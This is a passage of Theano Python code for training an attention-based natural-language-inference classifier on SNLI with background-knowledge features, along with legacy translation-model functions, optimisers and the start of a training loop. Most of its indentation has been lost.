pstate_ = tensor.dot(h1, W_comb_att)
pctx__ = pctx_ + pstate_[None, :, :]
# pctx__ += xc_
pctx__ = tensor.tanh(pctx__)
alpha = tensor.dot(pctx__, U_att) + c_tt
alpha = alpha.reshape([alpha.shape[0], alpha.shape[1]])
alpha = tensor.exp(alpha)
        if context_mask is not None:
            alpha = alpha * context_mask
alpha = alpha / alpha.sum(0, keepdims=True)
ctx_ = (cc_ * alpha[:, :, None]).sum(0) # current context
preact2 = tensor.dot(h1, U_nl) + b_nl
preact2 += tensor.dot(ctx_, Wc)
preact2 = tensor.nnet.sigmoid(preact2)
r2 = _slice(preact2, 0, dim)
u2 = _slice(preact2, 1, dim)
preactx2 = tensor.dot(h1, Ux_nl) + bx_nl
preactx2 *= r2
preactx2 += tensor.dot(ctx_, Wcx)
h2 = tensor.tanh(preactx2)
h2 = u2 * h1 + (1. - u2) * h2
h2 = m_[:, None] * h2 + (1. - m_)[:, None] * h1
return h2, ctx_, alpha.T # pstate_, preact, preactx, r, u
seqs = [mask, state_below_, state_belowx]
# seqs = [mask, state_below_, state_belowx, state_belowc]
_step = _step_slice
shared_vars = [tparams[_p(prefix, 'U')],
tparams[_p(prefix, 'Wc')],
tparams[_p(prefix, 'W_comb_att')],
tparams[_p(prefix, 'U_att')],
tparams[_p(prefix, 'c_tt')],
tparams[_p(prefix, 'Ux')],
tparams[_p(prefix, 'Wcx')],
tparams[_p(prefix, 'U_nl')],
tparams[_p(prefix, 'Ux_nl')],
tparams[_p(prefix, 'b_nl')],
tparams[_p(prefix, 'bx_nl')]]
if one_step:
rval = _step(*(seqs + [init_state, None, None, pctx_, context] +
shared_vars))
else:
rval, updates = theano.scan(_step,
sequences=seqs,
outputs_info=[init_state,
tensor.alloc(0., n_samples,
context.shape[2]),
tensor.alloc(0., n_samples,
context.shape[0])],
non_sequences=[pctx_, context] + shared_vars,
name=_p(prefix, '_layers'),
n_steps=nsteps,
profile=profile,
strict=True)
return rval
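# gru_cond_layer returns [h, ctx, alpha]:
#   h:     decoder hidden states, (n_timesteps, n_samples, dim)
#   ctx:   attention-weighted source contexts, (n_timesteps, n_samples, dimctx)
#   alpha: attention weights over source positions, (n_timesteps, n_samples, n_annotations)
# With one_step=True it runs a single decoding step and must be given init_state
# explicitly (see build_sampler below).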
'''
def init_params(options):
params = OrderedDict()
# embedding
params['Wemb'] = norm_weight(options['n_words_src'], options['dim_word'])
params['Wemb_dec'] = norm_weight(options['n_words'], options['dim_word'])
# encoder: bidirectional RNN
params = get_layer(options['encoder'])[0](options, params,
prefix='encoder',
nin=options['dim_word'],
dim=options['dim'])
params = get_layer(options['encoder'])[0](options, params,
prefix='encoder_r',
nin=options['dim_word'],
dim=options['dim'])
ctxdim = 2 * options['dim']
# init_state, init_cell
params = get_layer('ff')[0](options, params, prefix='ff_state',
nin=ctxdim, nout=options['dim'])
# decoder
params = get_layer(options['decoder'])[0](options, params,
prefix='decoder',
nin=options['dim_word'],
dim=options['dim'],
dimctx=ctxdim)
# readout
params = get_layer('ff')[0](options, params, prefix='ff_logit_lstm',
nin=options['dim'], nout=options['dim_word'],
ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit_prev',
nin=options['dim_word'],
nout=options['dim_word'], ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit_ctx',
nin=ctxdim, nout=options['dim_word'],
ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit',
nin=options['dim_word'],
nout=options['n_words'])
return params
'''
def init_params(options):
params = OrderedDict()
# embedding
#params['Wemb'] = norm_weight(options['dict_size'], options['dim_word'])
params['Wemb'] = options['allembs']
params['op_weights'] = norm_weight(options['op_num'] * options['op_dim'], options['op_dim'])
params['op_V'] = numpy.random.randn(options['op_num']).astype('float32')
# params['Wemb_dec'] = norm_weight(options['n_words'], options['dim_word'])
params = get_layer('ff')[0](options, params,
prefix='projOp',
nin=options['dim_word'],
nout=options['op_dim'])
# funcf
#params = get_layer('funcf_layer')[0](options, params,
# prefix='funcf',
# nin=options['dim_word'],
# nout=options['dim'])
# funcG
#params = get_layer('funcf_layer')[0](options, params,
# prefix='funcG',
# nin=options['dim_word'] * 2,
# nout=options['dim'])
#params = get_layer('ff')[0](options, params, prefix='bkProj',
# nin=options['dim'] + options['bk_dim'], nout=options['dim'],
# ortho=False)
#params = get_layer('ff')[0](options, params, prefix='WeightW',
# nin=options['bk_dim'], nout=1,
# ortho=False)
params = get_layer('ff')[0](options, params, prefix='funcG',
nin=options['dim'] * 2, nout=options['dim'],
ortho=False)
# readout
params = get_layer('ff')[0](options, params, prefix='ff_logit',
nin=options['dim'] * 2, nout=options['dim'],
ortho=False)
params = get_layer('ff')[0](options, params, prefix='ff_logit_linear',
nin=options['dim'], nout=options['class_num'],
ortho=False)
return params
def build_dam(tparams, options):
trng = RandomStreams(1234)
use_noise = theano.shared(numpy.float32(0.))
# description string: #words x #samples
x = tensor.matrix('x', dtype='int64')
bk_x = tensor.tensor4('x_bk', dtype='float32')
x_mask = tensor.matrix('x_mask', dtype='float32')
y = tensor.matrix('y', dtype='int64')
bk_y = tensor.tensor4('y_bk', dtype='float32')
y_mask = tensor.matrix('y_mask', dtype='float32')
#all_embs = tensor.matrix('emb', dtype='float32')
label = tensor.vector('label', dtype='int64')
n_timesteps_h = x.shape[0]
n_timesteps_t = y.shape[0]
n_samples = x.shape[1]
emb_h = tparams['Wemb'][x.flatten()]
emb_h = emb_h.reshape([n_timesteps_h, n_samples, options['dim_word']])
if options['use_dropout']:
emb_h = dropout_layer(emb_h, use_noise, trng)
emb_t = tparams['Wemb'][y.flatten()]
emb_t = emb_t.reshape([n_timesteps_t, n_samples, options['dim_word']])
if options['use_dropout']:
emb_t = dropout_layer(emb_t, use_noise, trng)
#proj_h = get_layer('funcf_layer')[1](tparams, emb_h, options,
# prefix='funcf')
#proj_t = get_layer('funcf_layer')[1](tparams, emb_t, options,
# prefix='funcf')
weight_matrix = tensor.batched_dot(emb_h.dimshuffle(1, 0, 2), emb_t.dimshuffle(1, 2, 0))
# bk_x
bk_x = bk_x.dimshuffle(1,0,2,3)
#bk_x = bk_x[:,:,:,(0,1,11,12)]
bk_m = theano.tensor.repeat(bk_x, repeats=options['op_dim'], axis=3)
bk_op = bk_m[:,:,:,:,None] * tparams['op_weights'][None,None,None,None,:,:]
bk_op = bk_op.reshape([n_samples, n_timesteps_h, n_timesteps_t, options['op_num'] * options['op_dim'],options['op_dim']])
bk_op = bk_op.dimshuffle(0,1,2,4,3)
emb_h_tmp = emb_h.dimshuffle(1,0,'x',2) + tensor.zeros([n_samples,n_timesteps_h,n_timesteps_t,options['dim']])
emb_h_tmp = emb_h_tmp.reshape([-1, options['dim_word']])
emb_h_tmp = get_layer('ff')[1](tparams, emb_h_tmp, options,prefix='projOp', activ='relu')
bk_op = bk_op.reshape([-1, options['op_dim'], options['op_num'] * options['op_dim']])
#emb_h_tmp.dimshuffle(0, 'x', 1) * r_hop.reshape [-1, options['op_num'], options['dim']
#r_hop = tensor.batched_dot(emb_h_tmp, bk_op)
bk_op = tensor.batched_dot(emb_h_tmp, bk_op)
emb_t_tmp = emb_t.dimshuffle(1,'x',0,2) + tensor.zeros([n_samples,n_timesteps_h,n_timesteps_t,options['dim']])
emb_t_tmp = emb_t_tmp.reshape([-1, options['dim_word']])
emb_t_tmp = get_layer('ff')[1](tparams, emb_t_tmp, options,prefix='projOp', activ='relu')
weight_bk = (bk_op.reshape([-1, options['op_num'], options['op_dim']]) * emb_t_tmp.dimshuffle(0, 'x', 1)).sum(2)
weight_bk = tensor.dot(tparams['op_V'], weight_bk.T)
weight_matrix = weight_matrix + weight_bk.reshape([n_samples, n_timesteps_h, n_timesteps_t])
weight_matrix_1 = tensor.exp(weight_matrix - weight_matrix.max(1, keepdims=True)).dimshuffle(1,2,0)
weight_matrix_2 = tensor.exp(weight_matrix - weight_matrix.max(2, keepdims=True)).dimshuffle(1,2,0)
# lenH * lenT * batchSize
alpha_weight = weight_matrix_1 * x_mask.dimshuffle(0, 'x', 1)/ weight_matrix_1.sum(0, keepdims=True)
beta_weight = weight_matrix_2 * y_mask.dimshuffle('x', 0, 1)/ weight_matrix_2.sum(1, keepdims=True)
##bk_y = bk_y.dimshuffle(2, 0, 1, 3)
#emb_h_bk = theano.tensor.repeat(emb_h[:,None,:,:],repeats=n_timesteps_t, axis=1)
#emb_h_bk = theano.tensor.concatenate([emb_h_bk,bk_y.dimshuffle(2,0,1,3)], axis=3)
#emb_h_bk = get_layer('ff')[1](tparams, emb_h_bk, options,prefix='bkProj', activ='relu')
## lenH * lenT * bachSize * dim
##bk_x = bk_x.dimshuffle(0, 2, 1, 3)
#emb_t_bk = theano.tensor.repeat(emb_t[None,:,:,:],repeats=n_timesteps_h, axis=0)
#emb_t_bk = concatenate([emb_t_bk,bk_x.dimshuffle(0,2,1,3)], axis=3)
#emb_t_bk = get_layer('ff')[1](tparams, emb_t_bk, options,prefix='bkProj', activ='relu')
alpha = (emb_h.dimshuffle(0, 'x', 1, 2) * alpha_weight.dimshuffle(0, 1, 2, 'x')).sum(0)
beta = (emb_t.dimshuffle('x', 0, 1, 2) * beta_weight.dimshuffle(0, 1, 2, 'x')).sum(1)
#alpha = (emb_h_bk * alpha_weight.dimshuffle(0, 1, 2, 'x')).sum(0)
#beta = (emb_t_bk * beta_weight.dimshuffle(0, 1, 2, 'x')).sum(1)
v1 = concatenate([emb_h, beta], axis=2)
v2 = concatenate([emb_t, alpha], axis=2)
proj_v1 = get_layer('ff')[1](tparams, v1, options,prefix='funcG', activ='relu')
proj_v2 = get_layer('ff')[1](tparams, v2, options, prefix='funcG', activ='relu')
logit1 = (proj_v1 * x_mask[:, :, None]).sum(0)
logit2 = (proj_v2 * y_mask[:, :, None]).sum(0)
logit = concatenate([logit1, logit2], axis=1)
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options, prefix='ff_logit', activ='tanh')
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options, prefix='ff_logit_linear', activ='linear')
probs = tensor.nnet.softmax(logit)
    predict_label = probs.argmax(axis=1)
#cost = -tensor.log(probs)[tensor.arange(label.shape[0]), label]
cost = tensor.nnet.categorical_crossentropy(probs, label)
return trng, use_noise, x, x_mask, bk_x, y, y_mask, bk_y, label, predict_label, cost
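# Compilation sketch (this is how train() below wires the graph up):
#   trng, use_noise, x, x_mask, bk_x, y, y_mask, bk_y, label, predict_label, cost = \
#       build_dam(tparams, model_options)
#   inps = [x, x_mask, bk_x, y, y_mask, bk_y, label]
#   f_log_probs = theano.function(inps, [cost, predict_label])
# cost is the per-sample categorical cross-entropy; train() takes cost.mean()
# before computing gradients.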
# build a training model
def build_model(tparams, options):
opt_ret = dict()
trng = RandomStreams(1234)
use_noise = theano.shared(numpy.float32(0.))
# description string: #words x #samples
x = tensor.matrix('x', dtype='int64')
x_mask = tensor.matrix('x_mask', dtype='float32')
y = tensor.matrix('y', dtype='int64')
y_mask = tensor.matrix('y_mask', dtype='float32')
# for the backward rnn, we just need to invert x and x_mask
xr = x[::-1]
xr_mask = x_mask[::-1]
n_timesteps = x.shape[0]
n_timesteps_trg = y.shape[0]
n_samples = x.shape[1]
# word embedding for forward rnn (source)
emb = tparams['Wemb'][x.flatten()]
emb = emb.reshape([n_timesteps, n_samples, options['dim_word']])
proj = get_layer(options['encoder'])[1](tparams, emb, options,
prefix='encoder',
mask=x_mask)
# word embedding for backward rnn (source)
embr = tparams['Wemb'][xr.flatten()]
embr = embr.reshape([n_timesteps, n_samples, options['dim_word']])
projr = get_layer(options['encoder'])[1](tparams, embr, options,
prefix='encoder_r',
mask=xr_mask)
# context will be the concatenation of forward and backward rnns
ctx = concatenate([proj[0], projr[0][::-1]], axis=proj[0].ndim - 1)
# mean of the context (across time) will be used to initialize decoder rnn
ctx_mean = (ctx * x_mask[:, :, None]).sum(0) / x_mask.sum(0)[:, None]
# or you can use the last state of forward + backward encoder rnns
# ctx_mean = concatenate([proj[0][-1], projr[0][-1]], axis=proj[0].ndim-2)
# initial decoder state
init_state = get_layer('ff')[1](tparams, ctx_mean, options,
prefix='ff_state', activ='tanh')
# word embedding (target), we will shift the target sequence one time step
# to the right. This is done because of the bi-gram connections in the
# readout and decoder rnn. The first target will be all zeros and we will
# not condition on the last output.
emb = tparams['Wemb_dec'][y.flatten()]
emb = emb.reshape([n_timesteps_trg, n_samples, options['dim_word']])
emb_shifted = tensor.zeros_like(emb)
emb_shifted = tensor.set_subtensor(emb_shifted[1:], emb[:-1])
emb = emb_shifted
# decoder - pass through the decoder conditional gru with attention
proj = get_layer(options['decoder'])[1](tparams, emb, options,
prefix='decoder',
mask=y_mask, context=ctx,
context_mask=x_mask,
one_step=False,
init_state=init_state)
# hidden states of the decoder gru
proj_h = proj[0]
# weighted averages of context, generated by attention module
ctxs = proj[1]
# weights (alignment matrix)
opt_ret['dec_alphas'] = proj[2]
# compute word probabilities
logit_lstm = get_layer('ff')[1](tparams, proj_h, options,
prefix='ff_logit_lstm', activ='linear')
logit_prev = get_layer('ff')[1](tparams, emb, options,
prefix='ff_logit_prev', activ='linear')
logit_ctx = get_layer('ff')[1](tparams, ctxs, options,
prefix='ff_logit_ctx', activ='linear')
logit = tensor.tanh(logit_lstm + logit_prev + logit_ctx)
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options,
prefix='ff_logit', activ='linear')
logit_shp = logit.shape
probs = tensor.nnet.softmax(logit.reshape([logit_shp[0] * logit_shp[1],
logit_shp[2]]))
# cost
y_flat = y.flatten()
y_flat_idx = tensor.arange(y_flat.shape[0]) * options['n_words'] + y_flat
cost = -tensor.log(probs.flatten()[y_flat_idx])
cost = cost.reshape([y.shape[0], y.shape[1]])
cost = (cost * y_mask).sum(0)
return trng, use_noise, x, x_mask, y, y_mask, opt_ret, cost
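# build_model above and build_sampler/gen_sample below come from the original
# attention-based encoder-decoder (NMT) code. They rely on parameters such as
# 'Wemb_dec', 'encoder' and 'decoder' that the active init_params() no longer
# creates, and train() below uses build_dam instead (its build_sampler call is
# commented out).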
# build a sampler
def build_sampler(tparams, options, trng, use_noise):
x = tensor.matrix('x', dtype='int64')
xr = x[::-1]
n_timesteps = x.shape[0]
n_samples = x.shape[1]
# word embedding (source), forward and backward
emb = tparams['Wemb'][x.flatten()]
emb = emb.reshape([n_timesteps, n_samples, options['dim_word']])
embr = tparams['Wemb'][xr.flatten()]
embr = embr.reshape([n_timesteps, n_samples, options['dim_word']])
# encoder
proj = get_layer(options['encoder'])[1](tparams, emb, options,
prefix='encoder')
projr = get_layer(options['encoder'])[1](tparams, embr, options,
prefix='encoder_r')
# concatenate forward and backward rnn hidden states
ctx = concatenate([proj[0], projr[0][::-1]], axis=proj[0].ndim - 1)
# get the input for decoder rnn initializer mlp
ctx_mean = ctx.mean(0)
# ctx_mean = concatenate([proj[0][-1],projr[0][-1]], axis=proj[0].ndim-2)
init_state = get_layer('ff')[1](tparams, ctx_mean, options,
prefix='ff_state', activ='tanh')
print 'Building f_init...',
outs = [init_state, ctx]
f_init = theano.function([x], outs, name='f_init', profile=profile)
print 'Done'
# x: 1 x 1
y = tensor.vector('y_sampler', dtype='int64')
init_state = tensor.matrix('init_state', dtype='float32')
# if it's the first word, emb should be all zero and it is indicated by -1
emb = tensor.switch(y[:, None] < 0,
tensor.alloc(0., 1, tparams['Wemb_dec'].shape[1]),
tparams['Wemb_dec'][y])
# apply one step of conditional gru with attention
proj = get_layer(options['decoder'])[1](tparams, emb, options,
prefix='decoder',
mask=None, context=ctx,
one_step=True,
init_state=init_state)
# get the next hidden state
next_state = proj[0]
# get the weighted averages of context for this target word y
ctxs = proj[1]
logit_lstm = get_layer('ff')[1](tparams, next_state, options,
prefix='ff_logit_lstm', activ='linear')
logit_prev = get_layer('ff')[1](tparams, emb, options,
prefix='ff_logit_prev', activ='linear')
logit_ctx = get_layer('ff')[1](tparams, ctxs, options,
prefix='ff_logit_ctx', activ='linear')
logit = tensor.tanh(logit_lstm + logit_prev + logit_ctx)
if options['use_dropout']:
logit = dropout_layer(logit, use_noise, trng)
logit = get_layer('ff')[1](tparams, logit, options,
prefix='ff_logit', activ='linear')
# compute the softmax probability
next_probs = tensor.nnet.softmax(logit)
# sample from softmax distribution to get the sample
next_sample = trng.multinomial(pvals=next_probs).argmax(1)
# compile a function to do the whole thing above, next word probability,
# sampled word for the next target, next hidden state to be used
print 'Building f_next..',
inps = [y, ctx, init_state]
outs = [next_probs, next_sample, next_state]
f_next = theano.function(inps, outs, name='f_next', profile=profile)
print 'Done'
return f_init, f_next
# generate samples, either with stochastic sampling or beam search. Note that
# this function iteratively calls the f_init and f_next functions.
def gen_sample(tparams, f_init, f_next, x, options, trng=None, k=1, maxlen=30,
stochastic=True, argmax=False):
# k is the beam size we have
if k > 1:
assert not stochastic, \
'Beam search does not support stochastic sampling'
sample = []
sample_score = []
if stochastic:
sample_score = 0
live_k = 1
dead_k = 0
hyp_samples = [[]] * live_k
hyp_scores = numpy.zeros(live_k).astype('float32')
hyp_states = []
# get initial state of decoder rnn and encoder context
ret = f_init(x)
next_state, ctx0 = ret[0], ret[1]
next_w = -1 * numpy.ones((1,)).astype('int64') # bos indicator
for ii in xrange(maxlen):
ctx = numpy.tile(ctx0, [live_k, 1])
inps = [next_w, ctx, next_state]
ret = f_next(*inps)
next_p, next_w, next_state = ret[0], ret[1], ret[2]
if stochastic:
if argmax:
nw = next_p[0].argmax()
else:
nw = next_w[0]
sample.append(nw)
sample_score -= numpy.log(next_p[0, nw])
if nw == 0:
break
else:
cand_scores = hyp_scores[:, None] - numpy.log(next_p)
cand_flat = cand_scores.flatten()
ranks_flat = cand_flat.argsort()[:(k - dead_k)]
voc_size = next_p.shape[1]
trans_indices = ranks_flat / voc_size
word_indices = ranks_flat % voc_size
costs = cand_flat[ranks_flat]
new_hyp_samples = []
new_hyp_scores = numpy.zeros(k - dead_k).astype('float32')
new_hyp_states = []
for idx, [ti, wi] in enumerate(zip(trans_indices, word_indices)):
new_hyp_samples.append(hyp_samples[ti] + [wi])
new_hyp_scores[idx] = copy.copy(costs[idx])
new_hyp_states.append(copy.copy(next_state[ti]))
# check the finished samples
new_live_k = 0
hyp_samples = []
hyp_scores = []
hyp_states = []
for idx in xrange(len(new_hyp_samples)):
if new_hyp_samples[idx][-1] == 0:
sample.append(new_hyp_samples[idx])
sample_score.append(new_hyp_scores[idx])
dead_k += 1
else:
new_live_k += 1
hyp_samples.append(new_hyp_samples[idx])
hyp_scores.append(new_hyp_scores[idx])
hyp_states.append(new_hyp_states[idx])
hyp_scores = numpy.array(hyp_scores)
live_k = new_live_k
if new_live_k < 1:
break
if dead_k >= k:
break
next_w = numpy.array([w[-1] for w in hyp_samples])
next_state = numpy.array(hyp_states)
if not stochastic:
# dump every remaining one
if live_k > 0:
for idx in xrange(live_k):
sample.append(hyp_samples[idx])
sample_score.append(hyp_scores[idx])
return sample, sample_score
# calculate the log probabilities (costs) and classification accuracy on a given corpus
def pred_probs(f_log_probs, prepare_data, options, iterator, verbose=False):
probs = []
n_done = 0
correct_num = 0
all_num = 0.
for x, x_syn, y, y_syn, label in iterator:
n_done += len(x)
all_num += len(label)
x, x_mask, bk_x, y, y_mask, bk_y, label = prepare_data(x, x_syn, y, y_syn, label,
n_words_src=options['n_words_src'], bk_for_x=options['bk_for_x'],
bk_for_y=options['bk_for_y'], bk_dim=options['bk_dim'],
maxlen= options['maxlen'],n_words=options['n_words'])
pprobs, predict_label = f_log_probs(x, x_mask, bk_x, y, y_mask, bk_y, label)
for pp in pprobs:
probs.append(pp)
if numpy.isnan(numpy.mean(probs)):
ipdb.set_trace()
if verbose:
print >> sys.stderr, '%d samples computed' % (n_done)
correct_num += (label == predict_label).sum()
print 'correct ', correct_num, 'all ', all_num
return numpy.array(probs), correct_num/all_num
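# pred_probs returns (per-sample costs, accuracy). train() uses the mean of the
# validation costs for model selection / early stopping and logs the accuracies.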
# optimizers
# name(hyperp, tparams, grads, inputs (list), cost) = f_grad_shared, f_update
def adam(lr, tparams, grads, inp, cost, beta1=0.9, beta2=0.999, e=1e-8):
gshared = [theano.shared(p.get_value() * 0., name='%s_grad' % k)
for k, p in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
f_grad_shared = theano.function(inp, cost, updates=gsup, profile=profile)
updates = []
t_prev = theano.shared(numpy.float32(0.))
t = t_prev + 1.
lr_t = lr * tensor.sqrt(1. - beta2 ** t) / (1. - beta1 ** t)
for p, g in zip(tparams.values(), gshared):
m = theano.shared(p.get_value() * 0., p.name + '_mean')
v = theano.shared(p.get_value() * 0., p.name + '_variance')
m_t = beta1 * m + (1. - beta1) * g
v_t = beta2 * v + (1. - beta2) * g ** 2
step = lr_t * m_t / (tensor.sqrt(v_t) + e)
p_t = p - step
updates.append((m, m_t))
updates.append((v, v_t))
updates.append((p, p_t))
updates.append((t_prev, t))
    upreturn = [item for sublist in updates for item in sublist]
f_update = theano.function([lr], upreturn, updates=updates,
on_unused_input='ignore', profile=profile)
return f_grad_shared, f_update
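# Note: f_update from adam() also returns the flattened list of update pairs
# (upreturn), which can be printed for debugging (see the commented-out
# 'update = f_update(lrate)' in train()); adadelta/rmsprop/sgd return no outputs.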
def adadelta(lr, tparams, grads, inp, cost):
print 'adadelta'
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_up2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rup2' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup + rg2up,
profile=profile)
updir = [-tensor.sqrt(ru2 + 1e-6) / tensor.sqrt(rg2 + 1e-6) * zg
for zg, ru2, rg2 in zip(zipped_grads, running_up2,
running_grads2)]
ru2up = [(ru2, 0.95 * ru2 + 0.05 * (ud ** 2))
for ru2, ud in zip(running_up2, updir)]
param_up = [(p, p + ud) for p, ud in zip(itemlist(tparams), updir)]
f_update = theano.function([lr], [], updates=ru2up + param_up,
on_unused_input='ignore', profile=profile)
return f_grad_shared, f_update
def rmsprop(lr, tparams, grads, inp, cost):
zipped_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_grad' % k)
for k, p in tparams.iteritems()]
running_grads = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad' % k)
for k, p in tparams.iteritems()]
running_grads2 = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_rgrad2' % k)
for k, p in tparams.iteritems()]
zgup = [(zg, g) for zg, g in zip(zipped_grads, grads)]
rgup = [(rg, 0.95 * rg + 0.05 * g) for rg, g in zip(running_grads, grads)]
rg2up = [(rg2, 0.95 * rg2 + 0.05 * (g ** 2))
for rg2, g in zip(running_grads2, grads)]
f_grad_shared = theano.function(inp, cost, updates=zgup + rgup + rg2up,
profile=profile)
updir = [theano.shared(p.get_value() * numpy.float32(0.),
name='%s_updir' % k)
for k, p in tparams.iteritems()]
updir_new = [(ud, 0.9 * ud - 1e-4 * zg / tensor.sqrt(rg2 - rg ** 2 + 1e-4))
for ud, zg, rg, rg2 in zip(updir, zipped_grads, running_grads,
running_grads2)]
param_up = [(p, p + udn[1])
for p, udn in zip(itemlist(tparams), updir_new)]
f_update = theano.function([lr], [], updates=updir_new + param_up,
on_unused_input='ignore', profile=profile)
return f_grad_shared, f_update
def sgd(lr, tparams, grads, inp, cost):
gshared = [theano.shared(p.get_value() * 0.,
name='%s_grad' % k)
for k, p in tparams.iteritems()]
gsup = [(gs, g) for gs, g in zip(gshared, grads)]
f_grad_shared = theano.function(inp, cost, updates=gsup,
profile=profile)
pup = [(p, p - lr * g) for p, g in zip(itemlist(tparams), gshared)]
f_update = theano.function([lr], [], updates=pup, profile=profile)
return f_grad_shared, f_update
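# Optimizer usage sketch (matches the call in train() below):
#   lr = tensor.scalar(name='lr')
#   f_grad_shared, f_update = eval(optimizer)(lr, tparams, grads, inps, cost)
#   cost_val = f_grad_shared(x, x_mask, bk_x, y, y_mask, bk_y, label)
#   f_update(lrate)   # lrate is the numeric learning rate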
def train(dim_word=100, # word vector dimensionality
dim=1000, # the number of LSTM units
bk_dim=13,
class_num=3,
op_num=3,
op_dim=50,
encoder='gru',
decoder='gru_cond',
patience=1000000, # early stopping patience
max_epochs=5000,
finish_after=10000000, # finish after this many updates
dispFreq=100,
decay_c=0., # L2 regularization penalty
alpha_c=0., # alignment regularization
clip_c=-1., # gradient clipping threshold
lrate=0.01, # learning rate
n_words_src=100000, # source vocabulary size
n_words=100000, # target vocabulary size
maxlen=100, # maximum length of the description
optimizer='rmsprop',
batch_size=16,
valid_batch_size=16,
saveto='modelOp.npz',
validFreq=1000,
saveFreq=1000, # save the parameters after every saveFreq updates
sampleFreq=100, # generate some samples after every sampleFreq
train_datasets=[
'../data/train_h_fix.tok',
'../data/train_t_fix.tok',
'../data/train_label.tok',
'../data/train_syn_h.syntok',
'../data/train_syn_t.syntok'],
valid_datasets=[
'../data/dev_h_fix.tok',
'../data/dev_t_fix.tok',
'../data/dev_label.tok',
'../data/dev_syn_h.syntok',
'../data/dev_syn_t.syntok'],
test_datasets=[
'../data/test_h_fix.tok',
'../data/test_t_fix.tok',
'../data/test_label.tok',
'../data/test_syn_h.syntok',
'../data/test_syn_t.syntok'],
dictionaries=[
'../data/snli_dict_fix.pkl',
'../data/bk_dict.pkl'],
embedings=[
'../data/snli_emb_300_fix.pkl'],
bk_dicts=[
'../data/bk_for_x.pkl',
'../data/bk_for_y.pkl'],
use_dropout=False,
reload_=False,
overwrite=False):
# Model options
model_options = locals().copy()
log = logging.getLogger(os.path.basename(__file__).split('.')[0])
# load dictionaries and invert them
worddicts = [None] * len(dictionaries)
worddicts_r = [None] * len(dictionaries)
for ii, dd in enumerate(dictionaries):
with open(dd, 'rb') as f:
worddicts[ii] = pkl.load(f)
worddicts_r[ii] = dict()
for kk, vv in worddicts[ii].iteritems():
worddicts_r[ii][vv] = kk
print 'Loading embedings ...'
with open(embedings[0], 'rb') as f:
pretrained_embs = pkl.load(f)
#pretrained_embs = theano.shared(pretrained_embs, name='pretrained_embs')
print 'Done'
model_options['allembs'] = pretrained_embs
print 'Loading bks ...'
with open(bk_dicts[0], 'rb') as f:
bk_for_x = pkl.load(f)
model_options['bk_for_x'] = bk_for_x
with open(bk_dicts[1], 'rb') as f:
bk_for_y = pkl.load(f)
    model_options['bk_for_y'] = bk_for_y
print 'Done'
# reload options
if reload_ and os.path.exists(saveto):
print 'Reloading model options'
with open('%s.pkl' % saveto, 'rb') as f:
model_options = pkl.load(f)
print 'Loading data'
train = TextIterator(train_datasets[0], train_datasets[1],
train_datasets[2], train_datasets[3], train_datasets[4],
dictionaries[0], dictionaries[1],
n_words_source=n_words_src, n_words_target=n_words,
batch_size=batch_size,
maxlen=maxlen)
valid = TextIterator(valid_datasets[0], valid_datasets[1],
valid_datasets[2],valid_datasets[3],valid_datasets[4],
dictionaries[0], dictionaries[1],
n_words_source=n_words_src, n_words_target=n_words,
batch_size=valid_batch_size,
maxlen=maxlen)
test = TextIterator(test_datasets[0], test_datasets[1],
test_datasets[2], test_datasets[3], test_datasets[4],
dictionaries[0], dictionaries[1],
n_words_source=n_words_src, n_words_target=n_words,
batch_size=valid_batch_size,
maxlen=maxlen)
print 'Building model'
params = init_params(model_options)
# reload parameters
if reload_ and os.path.exists(saveto):
print 'Reloading model parameters'
params = load_params(saveto, params)
tparams = init_tparams(params)
trng, use_noise, \
x, x_mask, bk_x, y, y_mask, bk_y, label, predict_label, \
cost = \
build_dam(tparams, model_options)
inps = [x, x_mask, bk_x, y, y_mask, bk_y, label]
# print 'Building sampler'
# f_init, f_next = build_sampler(tparams, model_options, trng, use_noise)
# before any regularizer
print 'Building f_log_probs...',
f_log_probs = theano.function(inps, [cost, predict_label], profile=profile)
print 'Done'
cost = cost.mean()
# apply L2 regularization on weights
# if decay_c > 0.:
# decay_c = theano.shared(numpy.float32(decay_c), name='decay_c')
# weight_decay = 0.
# for kk, vv in tparams.iteritems():
# weight_decay += (vv ** 2).sum()
# weight_decay *= decay_c
# cost += weight_decay
## regularize the alpha weights
#if alpha_c > 0. and not model_options['decoder'].endswith('simple'):
# alpha_c = theano.shared(numpy.float32(alpha_c), name='alpha_c')
# alpha_reg = alpha_c * (
# (tensor.cast(y_mask.sum(0) // x_mask.sum(0), 'float32')[:, None] -
# opt_ret['dec_alphas'].sum(0)) ** 2).sum(1).mean()
# cost += alpha_reg
# after all regularizers - compile the computational graph for cost
print 'Building f_cost...',
f_cost = theano.function(inps, cost, profile=profile)
print 'Done'
print 'Computing gradient...',
grads = tensor.grad(cost, wrt=itemlist(tparams))
print 'Done'
# apply gradient clipping here
if clip_c > 0.:
g2 = 0.
for g in grads:
g2 += (g ** 2).sum()
new_grads = []
for g in grads:
new_grads.append(tensor.switch(g2 > (clip_c ** 2),
g / tensor.sqrt(g2) * clip_c,
g))
grads = new_grads
# compile the optimizer, the actual computational graph is compiled here
lr = tensor.scalar(name='lr')
print 'Building optimizers...',
f_grad_shared, f_update = eval(optimizer)(lr, tparams, grads, inps, cost)
print 'Done'
print 'Optimization'
best_p = None
bad_counter = 0
bad_counter_acc = 0
uidx = 0
estop = False
history_errs = []
history_accs = []
epoch_accs = []
# reload history
if reload_ and os.path.exists(saveto):
